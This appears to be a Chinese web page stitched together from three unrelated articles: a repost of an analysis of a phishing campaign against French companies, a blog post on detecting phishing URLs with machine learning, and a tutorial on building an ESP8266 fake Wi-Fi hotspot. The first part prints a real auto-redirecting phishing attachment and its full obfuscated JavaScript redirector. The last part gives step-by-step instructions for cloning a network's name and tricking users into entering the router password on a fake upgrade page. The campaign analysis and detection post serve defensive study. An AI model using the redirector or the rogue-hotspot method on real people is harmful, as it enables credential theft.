絡安全公司F-Secure的研究人員在最近觀察到了一場針對法國工業領域的網絡釣魚活動,目標涵蓋化工制造�、航空航天��、汽車、銀行等領域,以及軟件提供商和IT服務提供商。研究人員表示�,從2018年10月開始�,他們捕獲了多封釣魚電子郵件��。從內容和附件來看����,它們均采用了相似的模板。
網絡釣魚電子郵件
釣魚電子郵件通常涉及到一些文檔,可能是附件��,也可能需要通過電子郵件提供的鏈接來獲取����。對于電子郵件的正文而言�,法語的使用顯得非常地道,使得這些電子郵件很具說服力����。
電子郵件的主題直接挪用了附件名稱的前綴�。附件可能是HTML文件����,也可能是PDF文件。通常被命名為“document”�、“ preuves ”或“ fact ”��,后跟下劃線和一個六位數數字,又或者直接就是一個六位數數字����。以下是研究人員所觀察到的一些附件名稱:
- fact_395788.xht
- document_773280.xhtml
- 474362.xhtml
- 815929.htm
- document_824250.html
- 975677.pdf
- 743558.pdf
以下是在11月15日活動中捕獲的一個XHTML附件樣本所包含的內容:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta content="UTF-8" />
</head>
<body onload='document.getElementById("_y").click();'>
<h1>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>
</h1>
</body>
</html>
活動的演變
在10月初發現的第一批網絡釣魚電子郵件�,包含沒有經過混淆處理的payload地址����。例如:
- hxxp://piecejointe[.]pro/facture/redirect[.]php
- hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX
這些鏈接要么位于HTML/XHTML/HTM附件中,要么直接存在于電子郵件的正文中����。另外��,電子郵件所使用的附件名稱大多數都是“document_[隨機數].xhtml”。
到10月底��,攻擊者對這些payload地址進行了混淆處理��。為此�,攻擊者使用了一個簡單的Javascript����。
var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
"\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77",
"\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77",
"\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77",
"\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77",
"\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77",
"\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77",
"\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77",
"\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77",
"\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77",
"\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77",
"\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77",
"\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77",
"\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77",
"\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77",
"\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77",
"\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77",
"\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77",
"\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77",
"\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77",
"\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77",
"\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77",
"\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77",
"\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77",
"\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)
上面這段Javascript代碼被作為附件的一部分提供�,用于對“[隨機字符串].pw”域名進行去混淆,進而將收件人重定向到payload域名��。在10月底的活動����,payload域名已經被更改為了hxxp://email-document-joint[.]pro/redir/。
然而��,在附件中使用Javascript代碼似乎并沒有取得太大的成功����。因為,在僅僅過了幾天之后,攻擊者就移除了用于對域名進行去混淆和重定向的Javascript代碼,轉而使用pste.eu�。pste.eu是一個類似于pastebin的HTML代碼服務平臺�。因此�,隨后的釣魚電子郵件都包含指向pste.eu的鏈接,如hxxps[://]pste[.]eu/p/yGqK[.]html����。
在11月的活動中�,研究人員再次觀察到了一些變化�。一些電子郵件開始包含有指向隨機.pw或.site域名子域名的鏈接,例如:
- hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
- hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site
與此同時����,PDF文件也開始以附件的形式出現在網絡釣魚電子郵件中��,這些PDF文件包含一個類似的指向隨機.site或.website域名子域名的鏈接。
在幾天之后的11月15日����,攻擊者開始使用Twitter短網址在pste.eu URL之間添加重定向�。他們通過Twitter帳戶發布了298個pste.eu URL�,然后將這些t.co URL添加在他們的網絡釣魚電子郵件中。攻擊者所使用的Twitter帳戶似乎都是一些廣告帳戶����,自2012年創建以來只有很少的動態更新��,并且大多數推文和轉推都與Twitter廣告活動�、產品或彩票等有關。
在這場活動中使用的最新鏈接是會導致302重定向的隨機.icu域名�,交付方法仍然是電子郵件中的XHTML/HTML附件或鏈接��。另外��,這場活動的發展十分迅速,攻擊者在生成新域名和探索新的重定向和混淆方法方面表現得尤為活躍。在撰寫本文時�,payload URL會導致重定向廣告����,涉及到多個不同的域名和URL��,而這些域和URL均包含了大量的惡意廣告����。
基礎設施
在這場活動中��,攻擊者主要使用的是被其劫持的Wanadoo電子郵件帳戶�,以及后來使用的的自主域名電子郵件帳戶(如rault@3130392E3130322E37322E3734.lho33cefy1g.pw)來發送釣魚電子郵件��。其中��,子域名即是電子郵件服務器的名稱,是服務器公共IP地址經過十六進制換算的結果�。對于這里所舉的例子而言�,服務器公共IP地址是109.102.72.74��。
包含在電子郵件中的鏈接能夠將收件人重定向到多個URL��,且大多數網站都托管在相同的服務器上。
在11月晚些時候,payload域名(如email-document-joint[.]pro或.pw)會將收件人重定向到諸如ffectuermoi[.]tk或eleverqualit[.]tk這樣的域名��。這些網站都托管在相同的服務器上��,具有許多類似的域名�。對這些服務器的進一步調查顯示����,它們長期以來就被用于托管PUP/Adware程序和惡意廣告URL�。
在ffectuermoi[.]tk上執行點擊操作,收件人最終將會被重定向到 doesok[.]top����。該網站不僅會展示廣告�,而且會利用cookie來收集用戶信息��。值得注意的是�,托管doesok[.]top的服務器長期以來也被用于托管PUP/廣告軟件/惡意軟件�。
額外的發現
在調查的過程中,研究人員在Virustotal上還發現了一個從法國提交的惡意文件。該文件是一個.zip壓縮文件�,包含以下內容:
- “All in One Checker”工具-一款可用于驗證電子郵箱賬戶和密碼是否有效的工具
- .vbs dropper-用于在執行“All in One Checker”工具時將后門釋放到用戶系統的腳本
- 由“All in One Checker”工具創建的文件夾-以“All in One Checker”工具執行時的當前日期和時間命名�,包含幾個文本文件:
- txt-用于記錄任何錯誤
- txt-用于記錄驗證結果
- txt- Ostatok代表的是“the rest”或“remainder”
.zip文件包含的內容:“03.10_17:55”是由“All in One Checker”創建的
幾乎所有包含在這些.txt文件中的電子郵件帳戶都自來.fr域名��,其中一個地址實際上與研究人員在10月19日的釣魚電子郵件中看到的發件人地址完全相同��。顯然,這個.zip文件很可能來自上述同一伙人。
本文由 黑客視界 綜合網絡整理�,圖片源自網絡��;轉載請注明“轉自黑客視界”,并附上鏈接�。
文介紹如何使用機器學習技術檢測一個URL是否是釣魚網站�,內容包括數據抓取��、特征選擇和模型訓練等�。
學編程�,上匯智網,在線編程環境�,一對一助教指導�。
我有一個客戶的郵箱最近差點被釣魚網站騙掉�。他的供應商的郵件被攻擊了,然后黑客使用這個供應商的郵箱給他發了一封催款郵件����,要求他支付到另一個銀行賬號����。幸運的是����,我的客戶給那個供應商 打電話進行了確認因此發現了騙局����。這使我意識到釣魚攻擊到處都在,我們不應當低估它的危害�。
下面是一些釣魚網站的例子��,基本上他們的目的就是騙到你的登錄賬號和密碼。這是一個仿冒Paypal的釣魚站:
這是一個仿冒的游戲站:
1����、初步分析
學編程�,上匯智網,在線編程環境��,一對一助教指導��。
在Kaggle上有一些釣魚數據集����,但是為此項目我希望生成自己的數據庫�。我使用了兩種數據源來構建釣魚URL清單:
- 合法URL:Ebubekir Büber (github.com/ebubekirbbr)
- 釣魚URL:phishtank.com
利用一點領域知識對這些合法和釣魚URL進行分析,我將可以從URL中得到的信息分為以下5個類別:
- URL:包含了一些線索��。有些釣魚URL是使用bit.ly等工具生成的短網址�, 還有一些則是包含了額外的參數,例如:
- https://services.runescape.com-u.cz/m=weblogin/loginform.wa725,200,119,49827406,1
- https://bit.ly/2Kni3xl?facebook
- 域名:二級域名可能存在釣魚風險����。例如:
- http://paypal-verify.com/customer_center/customer-IDPP00C227/myaccount/signin
- http://recoveryourpaypalacc.globalengg-mep.com/login/customer_center/customer-IDPP00C52
- 網絡:HTTP相應頭中可能包含有用的信息
- 頁面:總體來說����,釣魚網站總是使用一些表單試圖讓你輸入賬號��、郵件�、密碼等信息- Whois:域名往往是通過GoDaddy等注冊商注冊的
通過分析我還有以下的發現:
- 釣魚攻擊者通常會黑進合法的網站來插入釣魚網頁�,而不是搭建一個獨立域名進行 釣魚攻擊。雖然這會讓從域名來識別釣魚網站更困難����,我理解注冊商和托管商一旦 發現釣魚網頁都會迅速通知站長移除以避免對其排名的影響。這意味著我們可能會 看到被攻擊的域名的注冊商為空��。
- 有些釣魚網站可能包含惡意代碼而不是直接在瀏覽器中載入URL��。我這樣操作:
- 使用https://web-capture.net這樣的工具查看這些頁面的截圖
- 使用文本編輯器分析HTML代碼
2��、數據獲取
我的數據抓取器的概念模型大致如下:
基本的思路是盡可能保持代碼的模塊化,這樣我就可以在需要的時候添加新的分類��。我抓取的每個頁面都在本地文件存儲����,以便這些頁面在將來不可用時有個參考依據。
我使用BeautifulSoup來提取頁面信息����,通過設置隨機的user-agent����,可以減少請求被當作bot拒絕的可能����。
為了保證一致性,我也對URL進行了基本的預處理,例如移除www和結尾的斜杠��。
3����、探索式數據分析
學編程,上匯智網,在線編程環境��,一對一助教指導����。
由于抓取數據非常耗時,我決定開始我的探索式數據分析來找點感覺�。在分析了1817個URL(其中包括930個釣魚URL和887個合法URL)的特征之后,我選擇使用以下15個特征:
URL Domain Network Page Whois
-------------- --------------- ------------ ---------- ---------
length len_subdomain len_cookie length w_score
special_char is_https anchors
depth form
email
password
signin
hidden
popup
4、特征選擇
我是用LASSO正則化來識別重要的特征����。即使只用了一個小alpha值�,我已經發現了5個重要的特征:
[('len', 0.0006821926601753635),
('count_s', 0.0),
('depth', 0.0),
('len_subdomain', 0.0),
('is_https', 0.0),
('len_cookie', -0.0002472539769316538),
('page_length', -2.4074484401619206e-07),
('page_num_anchor', -0.0006943876695101922),
('page_num_form', -0.0),
('page_num_email', -0.0),
('page_num_password', 0.0),
('page_num_signin', 0.0),
('page_num_hidden', -0.00041105959874092535),
('page_num_popup', -0.0),
('w_score', -0.0)]
坦白說�,對于w_score沒起作用我有點驚訝。最終我決定使用這5個特征。
URL Domain Network Page Whois
-------- -------- ------------ --------- -------
length len_cookie length
anchors
hidden
然后我使用KNN搭了一個簡單的分類器作為基線。K選擇3并得到了還算可以的準確率0.793:
5����、模型
通過抓取我得到6906 個url��,3501合法, 3455 釣魚。不出意外的是許多釣魚頁面不可訪問了:
Type #URL processed #Pages available
------- ---------------- ------------------
Legit 4,000 3,501
Phish 6,000 3,455
利用這6906個樣本我再次進行特征選擇,篩選出同樣的5個特征。最優的K還是3,很好!
下面是模型的參數:
Model Accuracy
------------------- ----------
Naive Bayes 0.757
SVC 0.760
KNN (K=3) 0.791
Log. Reg. 0.822
Decision Tree 0.836
KNN (K=3, scaled) 0.845
Random Forest 0.885
原文鏈接:用機器學習檢測釣魚網站 — 匯智網用
實關于esp8266網上有許多教程����,好多前輩玩這個已經好多年了����,但為了給像我這樣的小白系統的解決制作過程中的一些問題,我還是寫出來。
我自己也是剛開始玩����,如有不對的地方還請大神們多多指教�。在此感謝iangzy��,老王�,歪哥為我解決了一些制作過程中的問題�。
1.esp8266模塊
首先當然你要有一塊esp8266模塊,像這樣的,最好是有底板的,帶Micro口的�,這些淘寶上都可以搜到的��,我的就是淘寶上買的,大概30-40RMB左右,當然�,如果你的動手能力比較強的話可以自己做底板��。
2.如何將固件下載到esp8266中
在這里你需要下載兩個東西,就是Flash下載工具和固件
將自己的esp8266插到電腦上�,確定連接沒問題的話打開設備管理器看下自己的串口是多少�,我這邊是COM6
將下載的Flash下載工具解壓�,打開ESPFlashDownloadTool_v3.4.9.2.exe,打開是這樣的��,選擇esp8266 DownloadTool
在這里需要注意的幾點是:
(1)固件選擇之前下載的固件DNS.ino.ino.nodemcu.bin����。
(2)地址輸入0×00000(可能地址這一欄會出現紅色的狀況�,導致無法燒入固件,此時把下載器關了重啟下��,然后把地址那欄清空再自己手動輸入就好了)��。
(3)這邊需要將DoNotChgBin勾選起來����,否則燒入固件后可能沒有wifi�,當然不同的板子可能不太一樣,這個請大家自行測試�。
(4)這邊串口按照自己之前查的選擇就行了����,波特率115200就可以了��。
其他設置按照紅框里面的選擇就行
設置完這些后就點擊START開始燒flash��,燒完后如果模塊正常的話電腦會多出來一個叫HH的wifi,這個wifi就是esp8266發出來的�。
如果沒有顯示HH�,就按下esp8266的RST鍵復位��,等個幾秒鐘就會顯示出來��。此時你就可以連接HH了。wifi的密碼為:m1234567
在這里我就不詳述了,擦完大概是這個樣子��,然后重新按照上面的步驟燒flash就可以了�。 )
3.用arduino上傳web到esp8266
我的是Windows系統,arduino版本是1.8.4�,安裝完后打開工具——開發板——開發板管理器��,此時會自動更新,過個數分鐘更新完畢后(當然��,如果用外網的話可能幾秒鐘就能解決)�,搜索eps8266,選擇第二個��,版本選2.2.0����,然后安裝����。
將上面解壓后的web源碼上傳工具的tools放到Arduino根目錄里合并,然后返回以下界面����,點擊文件——新建����,新建一個項目��,將里面的代碼清空�,然后點擊文件——保存����,將項目保存到一個你能找到的位置��,點擊工具——esp8266 sketch data upload,會出現以下的提示�,選擇No��,會發現新建的項目中多出來一個data文件夾,里面是空的��,然后將上面下載的web源碼\data里面的三個文件復制到這個文件夾里面�。
然后再返回arduino,點擊工具��,開發板按照自己買的選擇����,端口選擇自己的端口,其他設置如下圖紅框里面的�。
設置完后點擊esp8266 sketch data upload,這時不會出現提醒�,開始上傳web頁面����,等個1分鐘左右esp8266上的藍燈不閃爍了就表示上傳完了�。
然后電腦連接HH的wifi,瀏覽器輸入192.168.1.1/backdoor.html就能進入web頁面了����,如下圖����,路由器型號選擇通用型����,然后輸入你測試的wifi編號,點確定,電腦提示SSID偽造成功��,手機就會發現出現了個和你測試的wifi一樣的沒有加密的wifi�,原來的HH會不見了����,8266的藍燈常亮����,手機連接那個wifi后過幾秒會自動彈出路由器升級的頁面����,然后輸入管理員密碼,點擊開始升級�,此時你的esp8266會將管理員密碼保存����,升級完后����,8266的燈就會滅掉�。
電腦重新連接HH,進入web頁面后管理員密碼會在下面的紅框這一塊顯示��,這時����,就表示獲取密碼成功了。
到此��,整個esp8266制作釣魚wifi的教程到此結束����,祝大家玩的開心!??�!
